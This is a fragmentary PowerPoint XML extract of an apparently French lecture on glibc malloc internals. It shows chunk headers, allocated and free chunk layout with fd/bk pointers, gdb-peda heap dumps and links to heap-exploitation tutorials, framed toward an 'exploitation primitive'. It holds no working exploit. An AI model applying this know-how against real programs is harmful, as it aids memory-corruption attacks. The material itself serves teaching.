          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9048328" y="1893941"/>
            <a:ext cx="1800200" cy="129614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630E78-763E-4B34-9809-0700D42797A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919536" y="1893941"/>
            <a:ext cx="1800200" cy="129614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58B63C3-C134-4BB3-897F-15B5FAEE187F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719736" y="3410151"/>
            <a:ext cx="475252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AE430BB-F428-4B4E-B1E0-EDC6B7864CDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472264" y="3410151"/>
            <a:ext cx="237626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05B1FE7-BB7C-4C53-BE2D-816062727F58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4295800" y="1893941"/>
            <a:ext cx="4176464" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent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11A6A1-3482-4D85-A486-42E358968BE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3929014"/>
            <a:ext cx="2376264" cy="12961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334AFD0-29EB-4DEA-92CE-D422B715CAAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="81797" y="2395275"/>
            <a:ext cx="191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2. free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32E5180-A310-4098-AF41-0CC83156BFD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="68710" y="4392420"/>
            <a:ext cx="207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3. alloc 0x170</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193869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4" grpId="0" animBg="1"/>
      <p:bldP spid="2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B14845-79FE-4DC4-AC5E-13FACC90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83511AC-1807-4058-A56E-0996912DE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52400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633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Références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https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20Glibc_Adventures-The_Forgotten_Chunks.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://0x00sec.org/t/heap-exploitation-fastbin-attack/3627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6912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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nutshell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527845" y="3140968"/>
            <a:ext cx="2837769" cy="266429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User data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7845" y="2708920"/>
            <a:ext cx="1743963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+mj-lt"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3271808" y="2708920"/>
            <a:ext cx="370410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N</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3642219" y="2708920"/>
            <a:ext cx="363354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M</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4005573" y="2708920"/>
            <a:ext cx="360042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P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0" y="2057400"/>
            <a:ext cx="2841625" cy="6515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+mj-lt"/>
              </a:rPr>
              <a:t>user data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>(or previous chunk size if previous chunk is free)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="+mj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524000" y="1664804"/>
            <a:ext cx="2841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Allocated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk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1524000" y="5805264"/>
            <a:ext cx="2842805" cy="57606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+mj-lt"/>
              </a:rPr>
              <a:t>user data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>(or chunk size if chunk is free)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Connecteur droit avec flèche 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4365615" y="2924944"/>
            <a:ext cx="3633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4728969" y="2740278"/>
            <a:ext cx="5311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This bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> set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previous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk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allocated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380542" y="4134559"/>
            <a:ext cx="76204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/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>a (180 bytes)=0x56558008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>b (180 bytes)=0x565580c0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>c (180 bytes)=0x56558178</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gdb-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>peda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>$ x/4xw 0x56558008-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x56558000:     0x00000000      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x000000b9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00000000      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gdb-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>peda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>$ x/4xw 0x565580c0-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x565580b8:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x000000b9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00000000      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gdb-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>peda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>$ x/4xw 0x56558178-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x56558170:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x000000b9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00000000      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="14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722279" y="3206586"/>
            <a:ext cx="5311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B9 = 10111001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>00000001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>=&gt; P</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>10111000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> =&gt; B8 = 184</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Flèche : chevron 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E6C4506-CC06-49AA-8701-9AAD2E415E2E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Memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>layout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8" name="Flèche : chevron 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA2E857-250E-41D5-8B7D-FAFEC1D6FC1A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malloc,free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>calloc,realloc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" name="Flèche : chevron 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B6DE397-6C4D-4C3F-856D-5A144AB7517C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Exploitation primitive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE73B83D-DEB8-4CFE-9463-DEC9420A6C2E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is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predictable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1" name="Flèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{668E2924-C126-470E-81D9-9579301C71E2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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nutshell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2" name="Flèche : chevron 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E126735D-308C-4BA4-89F1-6C94ECAA6B77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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nutshell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2AC28A3-526D-4487-BC66-0F4BD72FA865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171257" y="6301566"/>
            <a:ext cx="740167" cy="43204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x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3154218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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nutshell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527845" y="3140968"/>
            <a:ext cx="2837769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+mj-lt"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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7845" y="2708920"/>
            <a:ext cx="1743963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+mj-lt"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3271808" y="2708920"/>
            <a:ext cx="370410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N</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3642219" y="2708920"/>
            <a:ext cx="363354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M</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4005573" y="2708920"/>
            <a:ext cx="360042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P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0" y="2032247"/>
            <a:ext cx="2837769" cy="67667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+mj-lt"/>
              </a:rPr>
              <a:t>user data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>(or previous chunk size if previous chunk is free)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="14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5805264"/>
            <a:ext cx="2837769" cy="5760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latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> size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7845" y="3573016"/>
            <a:ext cx="2837769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+mj-lt"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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7845" y="4005064"/>
            <a:ext cx="2837769" cy="1800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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Connecteur droit avec flèche 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4365614" y="3356992"/>
            <a:ext cx="43424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12" idx="3"/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4365614" y="3789040"/>
            <a:ext cx="44364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4799856" y="3172326"/>
            <a:ext cx="6004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Points to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>binlist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4809263" y="3604374"/>
            <a:ext cx="6004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Points to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>previous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>binlist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1524000" y="1664804"/>
            <a:ext cx="2841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Free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk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4397310" y="4134559"/>
            <a:ext cx="76204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/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>a (180 bytes)=0x56558008 (free)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>b (180 bytes)=0x565580c0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>c (180 bytes)=0x56558178</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gdb-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>peda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>$ x/4xw 0x56558008-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x56558000:     0x00000000      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x000000b9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0xf7fb07b0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0xf7fb07b0</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gdb-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>peda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>$ x/4xw 0x565580c0-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x565580b8:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x000000b8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
